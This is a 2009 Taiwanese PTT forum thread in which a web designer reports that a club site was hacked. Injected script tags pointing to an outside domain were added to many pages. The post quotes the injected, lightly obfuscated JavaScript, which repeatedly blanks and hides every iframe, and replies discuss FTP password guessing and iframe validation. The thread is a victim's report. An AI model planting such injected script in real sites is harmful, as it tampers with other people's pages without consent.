[閒聊] 最近被HACKED 只因為加了 iframe...

看板Web_Design作者 (reverse(wasefo);)時間14年前 (2009/11/03 15:53), 編輯推噓4(406)
留言10則, 5人參與, 最新討論串1/1
最近我社團的網站被駭進去 然後十幾頁網頁都被加了 <script src=http://anzantra.se/gastboken/b-one-default.php ></script> 內容是以下的CODE 感覺是 反iframe人仕入侵... <script> function M2Cx(){ var a=document.getElementsByTagName('ifr'+'ame'), s='about:blank', b; for(var i=0;i<a.length;i++) if((b=a[i]).src!=s){ b.src=s; b.style.display='none'; b.onload=function(){this.location=s}} if(!(--gEZ)) window.clearInterval(QKh) } gEZ=60000; M2Cx(); QKh=window.setInterval('M2Cx()',1); //iframes are EVIL! Hate Zeus! </script> function M2Cx(){ var a=document.getElementsByTagName('ifr'+'ame'), s='about:blank',b; for(vari=0;i<a.length;i++) if((b=a[i]).src!=s){ b.src=s;b.style.display='none'; b.onload=function(){this.location=s} } if(!(--gEZ))window.clearInterval(QKh) } gEZ=60000; M2Cx(); QKh=window.setInterval('M2Cx()',1); 有最近有跟我一樣的狀況嗎T.T 他還在smarty上動手腳 我在tpl裡debug好久跟白痴一樣... -- ※ 發信站: 批踢踢實業坊(ptt.cc) ◆ From: 140.115.50.29
11/04 04:27, , 1F
網址請拿掉 囧
11/04 04:27, 1F
11/04 17:15, , 2F
我是FTP密碼被猜中 然後被植入第一行的程式碼
11/04 17:15, 2F
11/04 17:15, , 3F
正確來說是本文第三行(? 網址是不一樣的就是
11/04 17:15, 3F
11/04 19:39, , 4F
網址只是iframe移除的JS CODE.... 應該還好
11/04 19:39, 4F
11/05 08:58, , 5F
請問iframe為什麼會被反呀? 安全性? 多線程難控制?
11/05 08:58, 5F
11/05 16:04, , 6F
W3C 基本教義派!?
11/05 16:04, 6F
11/05 22:06, , 7F
iframe在http://validator.w3.org 裡檢查是可以pass的.
11/05 22:06, 7F
11/06 09:58, , 8F
要看你檢查哪一種吧...XHTML 1.0 Strict應該是過不了
11/06 09:58, 8F
11/06 09:59, , 9F
基本上XHTML 1.0 Strict也不支援iframe
11/06 09:59, 9F
11/06 21:56, , 10F
frameset好像都要自成一頁,或是自己做特殊dtd檔......
11/06 21:56, 10F
更多 ot32em 的文章
文章代碼(AID): #1Ax-5nxo (Web_Design)